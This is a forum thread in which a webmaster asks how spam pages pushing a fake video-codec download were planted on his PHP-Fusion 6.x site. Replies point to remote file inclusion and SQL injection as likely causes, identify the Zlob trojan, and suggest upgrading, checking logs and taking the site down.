Forum Moderators: phranque
A new site subdirectory has been created and an index page of nonsense has been placed there, along with 2400+ short HTML files, the titles of which seem mostly concerned with game cheats; also health problems and sports. So far, all of them that I've sampled contain only a video viewer that requires a download to view anything. VERY suspicious! You can see what I see at
[snip]
Warning: I wouldn't accept the download it offers!
PHP-Fusion v6.x is said to be full of security holes and I've been advised to upgrade to V7. Sure, I'll do that, as soon as possible, but I'd like understand a bit better about how someone managed to upload these files to our site. The only other possibility I know of is that someone discovered an FTP username and password. Seems very unlikely in our situation, but I'm going to delete all accounts and change the master password, anyway.
My questions:
1. What kind of security problems in a PHP package would allow someone to create new directories and upload files to our site?
2. What typically available hosting control panel tools might help me explain what happened? (The site access logs don't show any relevant activity at the creation time range of these new files.)
3. So far, it seems only that this intrusion is taking up room on our site. What hidden kinds of damage should I look for? (Obviously, anyone accepting the download is likely going to be getting malware, but ... this seems like an awfully inefficient method.)
4. I've Googled on some key features of the uploaded pages, but I've failed to find any reports of a similar exploit. Where would I look? What kind of search terms would I use?
5. Overall, how likely is it that I'll ever identify the actually vulnerability? Should I just quit looking and fix the obvious points-- Update PHP-Fusion and FTP accounts-- and hope the issue doesn't re-occur?
6. Is there any downside to simply removing the uploaded files? Do the bad guys retaliate? (I'm planning on backing up the site entirely before making any changes -- but this is a data-heavy site, 50+GB and that's going to take a while.
7. Where else should I look for advice?
TIA,
Henry
[edited by: phranque at 4:21 am (utc) on Mar. 28, 2009]
[edit reason] No urls, please. See TOS [webmasterworld.com] [/edit]
the following WebmasterWorld threads should have some useful information to get you started on a solution:
How Hacked Servers Can Hurt Your Traffic [webmasterworld.com]
Hacker gets access to server. How? [webmasterworld.com]
<edit>Hi, Henry from Henry:)</edit>
If you have PHP files, remote file inclusion (<- search term) is the main threat. If they can trick your vulnerable script into fetching and including a remote script, then they can upload files and do anything else they want to your site.
Your access logs are a valuable source of information. Check the FTP log for unauthorized transfers. If none there, check the HTTP log for recent attacks.
Record the timestamp of the added files. Check logs for who was doing what at that time.
It looks like the major vulnerability of PHP Fusion is SQL injection (<- another search term), though its effects are usually different from what you are reporting. Malicious code goes onto the page, but it comes from the database. Thousands of new files wouldn't be part of it.
However, one of the vulnerabilities listed at Secunia (as only "partially patched") allows "system access".
The odds are that that "video viewer" (a "codec" by any chance?) is a package full of viruses.
What happened to your site is really much more serious than you seem to be thinking. Protect your visitors by shutting it down. Upgrade PHP Fusion. Get rid of the malicious files. Investigate, starting with your logs.
henry2, on the off chance that the video viewer is indeed the key to this thing, try a web search on fake video codec and see if anything that turns up looks familiar. If it does, do some reading on it because this is a common exploit, especially the "ZLOB Trojan". Although many of the reports are likely to be from the point of view of end-users, some hunting might turn up stories about how the exploit got installed on servers.
[edited by: SteveWh at 12:47 pm (utc) on Mar. 28, 2009]
phranque:
Thanks for the welcome and the articles. Which make my head spin. I had hoped not to get this deep in the technology. <grin>.
henry0:
I would definitely use SFTP if the hosting service supported it. It is a company well-known for domain registration services, but they also do hosting, and I'm not impressed with them for a number of reasons. I'm going to see if we can change to a different hosting service.
Nice to meet up with another Henry. Not too many of us around, it seems.
SteveWh:
Thanks for the link to Secunia. I had an idea something like this existed, but no idea how to look for it.
Thanks for the search term, "remote file inclusion". Now I'm worried about one of my other sites, D'oh!
From what I've seen, also, you are correct, the SQL Injection attack wouldn't usually leave thousands of new files.
I did a little more searching: Yes, the claimed video codec download is clearly a Zlob attack, it is a match, no doubt about it. But that's the second half. I haven't found any documentation of the first half, the thousands of files deposited on the server. Well, it doesn't matter, the penetration of the site is the foremost issue.
Bottom line:
All the docs and SteveWh's stern words have persuaded me to take down the site just as soon as possible, and my "management" has agreed. I don't think I need to read any more horror stories about how insecure PHP-Fusion 6.x is <grin>.
Thanks!
Henry
Thanks for your post on this thread.
Can you say a bit more about the symptoms of the inclusions you saw? What was the first symptom? What did you find on your server?
I haven't got anywhere figuring out which vulnerability was the method used on my site, and I guess it doesn't matter, so I'm going to use the latest versions of everything, and I've got a list of additional security measures, now adding disabling register_globals.
No one has specifically said anything about this, but I'm thinking of some measures to detect some obvious hacks, say, letting the 2 system managers know when directories are added. What else?
Thanks,
Henry
